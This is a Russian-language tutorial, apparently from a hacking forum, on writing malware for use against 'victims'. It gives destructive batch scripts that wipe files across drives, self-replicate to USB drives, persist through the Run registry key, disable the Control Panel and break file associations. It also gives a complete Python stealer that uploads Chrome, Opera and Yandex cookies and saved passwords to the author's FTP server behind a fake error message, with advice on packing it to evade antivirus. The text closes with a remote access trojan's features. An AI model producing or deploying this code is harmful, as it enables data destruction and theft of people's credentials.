Написание элементарных вирусов

Приступим:

1) Открываем блокнот;
2) Пишем в нем «mspaint», без кавычек;
3) Сохраняем файл под любым именем, но вместо.txt мы напишем.bat;
4) Открываем файл, и увидим, что открылся Paint JJJ
Вот и готова наша первая программка. Вместо «mspaint» можно вписать любую программу, например: Calc-калькулятор, Taskmgr-диспетчер задач… Но при чем здесь вирусы? - спросите вы. Ни при чем! J Следующее, что мы сделаем, это программа для изменения времени на компьютере, да и еще она будит копировать себя на флешку (если та вставлена).
Итак, пишем в блокноте:

time 00:00
copy %0 F:\Work.bat

Первой строчкой мы изменяем время на 00:00, а второй скопируем файл на диск (F, G, J, K, H) - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате.bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число. Теперь небольшой перечень того, что можно писать в блокнотовском вирусе.

Список команд:

1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat);
2) «label x:y» - переименовывает диск x на имя y (пример label C:error);
3) «time х:у» - меняет время на х часов и у минут (пример time 14:27);
4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05);
5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka);
6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок);
7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q);
8) «assoc.х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc.exe=.mp3);
9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);

Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя.

1) Программа для удаления файлов с флешки (если та вставлена) и переименования ее.
del F:\ *.* /q
label F:HACK

2) Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.
time 14:13
date 11.07.12
copy %0 C:\Time.bat
copy %0 F:\Time.bat

Вы уже умеете создавать простенькие вирусы. Он умеет: менять время, дату, названия дисков и флешек, открывать программы, создавать папки, копировать себя, добавлять пользователей, менять расширения и уничтожать информацию. Это довольно небольшой список, честно говоря. Теперь я научу вас некоторым тонкостям вирусописательства. Допустим, вы уже сделали вирус, но выглядит он довольно некрасиво. Ну, кто откроет непонятный файл? Вы правы, таких людей на свете не много. Как же изменить формат из.bat на.exe. Очень легко (Нужно чтобы на компьютере был WinRAR). Находим любой вирус с расширением.bat, нажимаем на него правой кнопкой, жмем «Добавить в архив…». Ставим галочку «Создать SFX-архив», выбираем вкладку дополнительно, и кликаем на кнопку «Параметры SFX…». В окне «Выполнить после распаковки» пишем названия вируса (пример Virus.bat) а в окне «Текст и графика» далее «Загрузить значок SFX из фала». Жмем «Обзор» и ищем любой значок формата.ico. Теперь жмем ОК. Готово  формат.exe, а не.bat, как нам и надо было. Теперь можно делать с вирусами что угодно. А что именно, решать уже вам.
Допустим, вы написали вирус, который будет портить открытую от папок информацию и немного вредить:

del C:\ *.* /q
del D:\ *.* /q
del E:\ *.* /q
del F:\ *.* /q
time 00:00
date 13.06.23
del *.* /q

Готов ли наш вирус? – Спросите себя. Конечно, нет. Нужно его немедленно закончить. В этом я вам с удовольствием помогу. И так наша новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус:

@echo off
del C:\ *.* /q >nul
del D:\ *.* /q >nul
del E:\ *.* /q >nul
del F:\ *.* /q >nul
time 00:00 >nul
date 13.06.23 >nul
del *.* /q >nul

Вот, теперь наш вирус готов. Вы можете проверить его. Но не советую вам проверять его на вашем ПК. Сохраняем, конвертируем, а вот, что дальше с ним делать — ваше дело. Кстати, есть отличная программа для конвертирования.bat в.exe, она работает намного лучше WinRAR'а, называется она «Bat to exe converter». Скачать ее можно в интернете, она бесплатная. Итак, вернемся к вирусо-писательству.

 %SystemRoot%/system32/rundll32 user32, SwapMouseButton

Данная строчка меняет клавиши мыши местами. Можно с кого-то прикольнуться, пока он въедет, что случилось, пройдет время (если он совсем юзер), для особоодаренных скажу, если вы ввели это у себя отключить довольно просто: «Панель Управления», «Принтеры и другое оборудование», «Мышь» и снимаем первую галочку.
Итак, дальше поехали дальше:

:x;
Start mspaint
goto x;

Очень неплохая строка для нагрузки слабеньких машин. Команда открывает Paint, причем очень быстро. Раз 60 до того как вы поймете, что случилось и закроете программу. Попробуйте ввести вместо mspaint любые строки программ... Можно использовать по несколько таких команд до полного торможения компьютера нашей жертвы.

Пишем новый скрипт:

copy ""%0"" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Очень жестокая команда, добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, и едем дальше.

assoc.lnk=.txt >nul
assoc.exe=.mp3 >nul

Данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. Он меняет расширения всех файлов на компьютере с .lnk в .txt и .exe в .mp3. То есть все ярлыки, открываются в блокноте, а программы, все, в плеере. Круто, да? Теперь прочтите нижний код и если вы поняли, в чем суть вируса, поздравляю вас, вы закончили базовый курс вирусописательства. Если же нет. Читаем все заново)

@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:IDIOT >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nul
md 11 >nul
md 12 >nul
md 13 >nul
md 14 >nul
md 15 >nul
md 16 >nul
md 17 >nul
md 18 >nul
md 19 >nul
md 20 >nul
md 21 >nul
md 22 >nul
md 23 >nul
md 24 >nul
md 25 >nul
md 26 >nul
md 27 >nul
assoc.lnk=.txt >nul
assoc.exe=.txt >nul
:x;
Start mspaint
goto x;
:x;
Start Calc
goto x;
copy ""%0"" "%SystemRoot%\system32\Cool.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul

Написание стиллера

Напишем сегодня стиллер на пайтоне, и запакуем его в exe, чтоб он не палился антивирусами, по моим данным (1/67)

Начнем с самого простого: подключения библиотек.

Python:

import os.path

import getpass

from ftplib import FTP

import random

con = FTP("хост","логин","пароль")

 

Первая библиотека (os.path) - используется для проверки директории на валидность, точнее на то, существует ли она в природе.

Вторая библиотека (getpass) - используется для получения юзернейма пользователя, под которым запущен процесс, это нужно для доступа к папке AppData.

Третья библиотека (ftplib) - тут самое интересное, она нам поможет отправлять пароли по FTP на наш сервер.

Четвертая библиотека(random) - ну тут все просто, мы рандомизируем названия файла, который отправляем на сервер.

И напоследок, мы подключаемся по ftp по логину, паролю и хосту.

Теперь перейдем к более интересным вещам, чем просто библиотеки, напишем уже сами пути к директориям, где лежат наши пароли, а пароли будем воровать (в учеб.целях) из браузеров - Opera, Yandex, Google Chrome

 

Итак, вот код, пишем его, далее будем его разбирать

Python:

UserName = '\\' + getpass.getuser()

dir_cookie_google = 'C:\\Users'+UserName+'\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies'

dir_pass_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"

 

dir_cookie_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies"

dir_pass_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker"

 

dir_cookie_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies"

dir_pass_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"

UserName - принимает значения имя текущего пользователя

dir_cookie_google, dir_pass_google,....,... - и т.д. Это все директории где хранятся пароли, нам интерестны именно эти 3 браузера. Будем забирать пароли и куки и перекидывать их себе на сервер по FTP. Потом открывать в sqlite manager, но об этом позже....

 

У нас имеются директории, у нас есть библиотеки для работы, что же дальше? Пора приступать к основной задаче - написанию стиллера.

 

Вот код, пока напишите его, а я потом расскажу о нем))Python:

dir_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies"

dir_firefox = "C:\\Users"+UserName+"\\AppData\\Roaming\\Mozilla\\Firefox"

dir_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex"

dir_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software"

 

def check():

if (os.path.exists(dir_google)) == True:

   filename = "google"+str(random.randint(1, 10000))

   filename2 = "google_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_google, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_google, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

if (os.path.exists(dir_opera)) == True:

   filename = "opera"+str(random.randint(1, 10000))

   filename2 = "opera_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_opera, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_opera, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

if (os.path.exists(dir_yandex)) == True:

   filename = "yandex"+str(random.randint(1, 10000))

   filename2 = "yandex_pass" + str(random.randint(1, 10000))

     with open(dir_cookie_yandex, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_yandex, "rb") as content:

Код получился не маленький, что есть то есть. Рассмотрим первые строчки. В начале, до функции, мы записываем в переменные адреса наших директорий для последующей проверки на валидность. "Зачем это нужно?", - спросите вы меня. Да так проще! Зачем ставить try, except, если можно проверить на валидность с помощью os.path.exits.

 

Далее у идет функция, со множествами if, но тут ничего ничего сложного нет, все просто:Python:

 if (os.path.exists(dir_google)) == True:

   filename = "google"+str(random.randint(1, 10000))

   filename2 = "google_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_google, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_google, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

Мы проверяем, является ли директория валидной, а после открываем ее, и отправляем файл на наш сервер FTP. Такс... Функцию написали, библиотеки подключили, директории есть. Чего не хватает? Думаю, не хватает задействовать функцию и вывести на экран какую-нибудь псевдо-ошибку, что мол библиотека не подключена и все дела. Будем действовать по такой схеме))

 

Вот код:

Python:

check()

print("Error library import HOUII.dll")

print("Error RUN cheat")

input()

Первая строка - вызов функции, которая ворует пароли.

 

Далее выводим сообщения об "ошибке", чтобы пользователь думал, что это у него проблемы какие то. И что программа не зловредная, а наоборот, пыталась помочь. Но, как оказалось, библиотеки видите ли у него нет))

 

Вот и весь код, ниже он целиком:

Python:

import os.path

import getpass

from ftplib import FTP

import random

 

con = FTP("хост","логин","пароль")

 

"""

Hack to directory

"""

UserName = '\\' + getpass.getuser()

 

dir_cookie_google = 'C:\\Users'+UserName+'\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies'

dir_pass_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"

dir_cookie_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies"

dir_pass_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker"

dir_cookie_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies"

dir_pass_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"

dir_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies"

dir_firefox = "C:\\Users"+UserName+"\\AppData\\Roaming\\Mozilla\\Firefox"

dir_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex"

dir_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software"

 

def check():

if (os.path.exists(dir_google)) == True:

   filename = "google"+str(random.randint(1, 10000))

   filename2 = "google_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_google, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_google, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

if (os.path.exists(dir_opera)) == True:

   filename = "opera"+str(random.randint(1, 10000))

   filename2 = "opera_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_opera, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_opera, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

if (os.path.exists(dir_yandex)) == True:

   filename = "yandex"+str(random.randint(1, 10000))

   filename2 = "yandex_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_yandex, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_yandex, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

 

check()

print("Error library import HOUII.dll")

print("Error RUN cheat")

input()

 

У нас есть код, но он на пайтоне, как же его эксплуатировать на чужом ПК?

Ответ - pyinstaller

Скачаем его:

Bash:

pip install pyinstaller

Далее скомпилируем его в EXE'шник, дабы было все проще))

Bash:

pyinstaller -F <my_script>.py

Вот и все, по сути у нас есть EXE файл, который не палится антивирусами, ну разве что windows защитник может его заподозрить, все же мы ходим по директориям. Кроме того еще и отправляем файлы на какой то не понятный сервер.... НО на практике kaspersky, dr.web, и др популярные антивирусы не определяют его как вредоносное программное обеспечения, даже если ему тыкнуть носом, вот мол, смотри, давай его просканируем, может там вирусы трояны бэкдоры! он говорит - нет, там нету ничего....

Написание RAT

RAT — аббревиатура англ. Remote Access Trojan, в переводе — «Троян удаленного доступа» или «средство удалённого управления» Термин получил распространение среди системных администраторов и хакеров. Стоит отметить что, чаще всего этот термин используют крэкеры, понимая под этим утилиту для несанкционированного доступа к системе удаленного пользователя с корыстными целями.

Revenge-Rat 0.3 - программа с автоматической, скрытой установкой, служащая для удаленного управления компьютерами и скрытного

наблюдения за пользователями захваченных систем.  

Функционал:

- Получение различной информации о удаленной системе;

- Отображение запущенных процессов, установленных программ, автозагрузки;

- Встроенный менеджер файлов с помощью которого можно стащить файлы с удаленной машины или наоборот закинуть туда свои файлы;

- Удаленное управление рабочим столом;

- Наблюдение через web-камеру, прослушка помещения через микрофон;

- Встроенный кейлоггер с захватом буфера обмена и стилер паролей;

- Редактирование файла hosts (можно перенаптавлять жертву на фейковые сайты);

- Лоадер файлов с функцией обновления трояна, а также загрузкой и запуском дополнительного софта;

- Удаленный доступ к командной строке и многое другое;
 

Ну это уже тема для отдельной книги,а если хотите в этом разберетесь сами